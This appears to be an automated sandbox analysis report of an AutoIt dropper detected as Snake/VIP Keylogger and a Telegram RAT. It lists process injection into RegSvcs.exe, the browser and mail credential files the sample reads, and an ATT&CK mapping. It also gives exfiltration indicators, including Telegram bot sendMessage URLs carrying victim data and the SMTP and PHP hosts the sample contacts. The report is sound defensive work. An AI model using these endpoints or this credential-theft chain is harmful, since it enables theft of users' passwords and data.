                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 8C9008Jump to behavior
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: D83008Jump to behavior
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DB1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00DB1201
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D92BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00D92BA5
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DBB226 SendInput,keybd_event,0_2_00DBB226
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DD22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_00DD22DA
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\AHSlIDftf1.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\konked\Sancerre.exe "C:\Users\user\AppData\Local\konked\Sancerre.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\konked\Sancerre.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DB0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00DB0B62
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DB1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00DB1663
                  Source: AHSlIDftf1.exe, Sancerre.exe.0.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: AHSlIDftf1.exe, Sancerre.exeBinary or memory string: Shell_TrayWnd
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D70698 cpuid 0_2_00D70698
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DC8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00DC8195
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DAD27A GetUserNameW,0_2_00DAD27A
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D8BB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00D8BB6F
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D542DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00D542DE
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 00000008.00000002.2973433634.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2974305954.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 1.2.Sancerre.exe.730000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.Sancerre.exe.1450000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.Sancerre.exe.730000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.Sancerre.exe.1450000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Sancerre.exe PID: 5812, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3328, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Sancerre.exe PID: 3244, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4048, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 1.2.Sancerre.exe.730000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.Sancerre.exe.1450000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.Sancerre.exe.730000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.Sancerre.exe.1450000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Sancerre.exe PID: 5812, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3328, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Sancerre.exe PID: 3244, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Sancerre.exeBinary or memory string: WIN_81
                  Source: Sancerre.exeBinary or memory string: WIN_XP
                  Source: Sancerre.exe.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                  Source: Sancerre.exeBinary or memory string: WIN_XPe
                  Source: Sancerre.exeBinary or memory string: WIN_VISTA
                  Source: Sancerre.exeBinary or memory string: WIN_7
                  Source: Sancerre.exeBinary or memory string: WIN_8
                  Source: Yara matchFile source: 1.2.Sancerre.exe.730000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.Sancerre.exe.1450000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.Sancerre.exe.730000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.Sancerre.exe.1450000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2973433634.000000000308A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Sancerre.exe PID: 5812, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3328, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Sancerre.exe PID: 3244, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4048, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 00000008.00000002.2973433634.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2974305954.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 1.2.Sancerre.exe.730000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.Sancerre.exe.1450000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.Sancerre.exe.730000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.Sancerre.exe.1450000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Sancerre.exe PID: 5812, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3328, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Sancerre.exe PID: 3244, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4048, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 1.2.Sancerre.exe.730000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.Sancerre.exe.1450000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.Sancerre.exe.730000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.Sancerre.exe.1450000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Sancerre.exe PID: 5812, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3328, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Sancerre.exe PID: 3244, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DD1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00DD1204
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DD1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00DD1806
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_005F1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,1_2_005F1204
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_005F1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,1_2_005F1806

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information111
                  Scripting                  		2
                  Valid Accounts                  		1
                  Native API                  		111
                  Scripting                  		1
                  Exploitation for Privilege Escalation                  		11
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		1
                  Web Service                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault AccountsScheduled Task/Job1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Deobfuscate/Decode Files or Information                  		21
                  Input Capture                  		1
                  Account Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		4
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAt2
                  Valid Accounts                  		2
                  Valid Accounts                  		3
                  Obfuscated Files or Information                  		Security Account Manager3
                  File and Directory Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		11
                  Encrypted Channel                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron2
                  Registry Run Keys / Startup Folder                  		21
                  Access Token Manipulation                  		1
                  DLL Side-Loading                  		NTDS127
                  System Information Discovery                  		Distributed Component Object Model21
                  Input Capture                  		1
                  Non-Standard Port                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                  Process Injection                  		1
                  Masquerading                  		LSA Secrets321
                  Security Software Discovery                  		SSH3
                  Clipboard Data                  		3
                  Non-Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
                  Registry Run Keys / Startup Folder                  		2
                  Valid Accounts                  		Cached Domain Credentials111
                  Virtualization/Sandbox Evasion                  		VNCGUI Input Capture24
                  Application Layer Protocol                  		Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
                  Virtualization/Sandbox Evasion                  		DCSync2
                  Process Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                  Access Token Manipulation                  		Proc Filesystem11
                  Application Window Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
                  Process Injection                  		/etc/passwd and /etc/shadow1
                  System Owner/User Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  System Network Configuration Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1587865 Sample: AHSlIDftf1.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 30 reallyfreegeoip.org 2->30 32 api.telegram.org 2->32 34 3 other IPs or domains 2->34 42 Suricata IDS alerts for network traffic 2->42 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 52 10 other signatures 2->52 8 AHSlIDftf1.exe 4 2->8         started        12 wscript.exe 1 2->12         started        signatures3 48 Tries to detect the country of the analysis system (by using the IP) 30->48 50 Uses the Telegram API (likely for C&C communication) 32->50 process4 file5 26 C:\Users\user\AppData\Local\...\Sancerre.exe, PE32 8->26 dropped 58 Binary is likely a compiled AutoIt script file 8->58 60 Found API chain indicative of sandbox detection 8->60 14 Sancerre.exe 2 8->14         started        62 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->62 18 Sancerre.exe 1 12->18         started        signatures6 process7 file8 28 C:\Users\user\AppData\...\Sancerre.vbs, data 14->28 dropped 64 Multi AV Scanner detection for dropped file 14->64 66 Binary is likely a compiled AutoIt script file 14->66 68 Machine Learning detection for dropped file 14->68 74 3 other signatures 14->74 20 RegSvcs.exe 15 2 14->20         started        70 Writes to foreign memory regions 18->70 72 Maps a DLL or memory area into another process 18->72 24 RegSvcs.exe 2 18->24         started        signatures9 process10 dnsIp11 36 mail.standartasansor.com 178.210.170.40, 49759, 49773, 587 PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR Turkey 20->36 38 api.telegram.org 149.154.167.220, 443, 49751, 49772 TELEGRAMRU United Kingdom 20->38 40 2 other IPs or domains 20->40 54 Tries to steal Mail credentials (via file / registry access) 24->54 56 Tries to harvest and steal browser information (history, passwords, etc) 24->56 signatures12

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  AHSlIDftf1.exe70%VirustotalBrowse
                  AHSlIDftf1.exe74%ReversingLabsWin32.Trojan.AutoitInject
                  AHSlIDftf1.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\konked\Sancerre.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\konked\Sancerre.exe74%ReversingLabsWin32.Trojan.AutoitInject

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://mail.standartasansor.com0%Avira URL Cloudsafe
                  http://51.38.247.67:8081/_send_.php?L0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  reallyfreegeoip.org
                  		104.21.64.1
                  		truefalse
                    		high
                    api.telegram.org
                    		149.154.167.220
                    		truefalse
                      		high
                      mail.standartasansor.com
                      		178.210.170.40
                      		truetrue
                        		unknown
                        checkip.dyndns.com
                        		193.122.6.168
                        		truefalse
                          		high
                          checkip.dyndns.org
                          		unknown
                          		unknownfalse
                            		high

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20and%20Time:%2011/01/2025%20/%2000:31:36%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20367706%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                              		high
                              https://reallyfreegeoip.org/xml/8.46.123.189false
                                		high
                                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20and%20Time:%2011/01/2025%20/%2001:51:01%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20367706%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                  		high
                                  http://checkip.dyndns.org/false
                                    		high

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://www.office.com/RegSvcs.exe, 00000008.00000002.2973433634.0000000003166000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.000000000308A000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20aRegSvcs.exe, 00000002.00000002.2974305954.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000003066000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://api.telegram.orgRegSvcs.exe, 00000002.00000002.2974305954.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000003066000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://api.telegram.org/botSancerre.exe, 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2974305954.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, Sancerre.exe, 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000003066000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
